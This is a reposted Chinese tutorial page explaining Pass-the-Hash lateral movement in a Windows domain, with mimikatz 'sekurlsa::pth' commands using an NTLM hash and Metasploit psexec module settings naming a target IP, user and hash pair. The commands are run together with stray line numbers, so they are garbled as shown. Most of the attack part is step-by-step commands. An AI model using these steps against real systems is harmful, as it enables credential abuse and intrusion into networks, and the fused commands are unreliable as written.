商城首页欢迎来到中国正版软件门户

您的位置:首页 >Hash传递原理与应用解析

Hash传递原理与应用解析

  发布于2025-10-11 阅读(0)

扫一扫,手机访问

当我们获得一台服务器的SYSTEM权限后,成功获取了服务器的HASH值,但无法捕获到明文密码或解密密码时,我们可以尝试使用Pass The Hash(Hash传递)技术进行横向渗透攻击。

使用mimikatz进行PTH攻击

Hash传递相关知识点在这个实验中,我们使用的是Windows Server 2012 R2作为域控制器,未能捕获到明文密码,且无法解密设置的密码,注意这里的SID为500。

接下来,在攻击机器上(位于域控中的机器)运行mimikatz,并输入以下命令:

12 privilege::debugsekurlsa::pth /user:Administrator /domain:domainname /ntlm:519c985a849313d2c8029b293b57de1f 执行后会弹出一个新的CMD窗口。

Hash传递相关知识点这种方法可能显得有些鸡肋,因为它会弹出一个新的CMD窗口。你必须登录到域内的一台3389才能利用这种方式。如果无法登录域内的远程桌面,这种命令行方式就无法使用,就像在Windows 10中绕过UAC一样,不太喜欢这种弹出新窗口的方式。

使用Metasploit进行PTH攻击

1234 use exploit/windows/smb/psexecset rhosts 192.168.15.181set SMBUser rabbitmaskset SMBPass aad3b435b51404eeaad3b435b51404ee:0515322a55615056aaabb044a48463a4
本文转载于:https://cloud.tencent.com/developer/article/1595573 如有侵犯,请联系zhengruancom@outlook.com删除。
免责声明:正软商城发布此文仅为传递信息,不代表正软商城认同其观点或证实其描述。

热门关注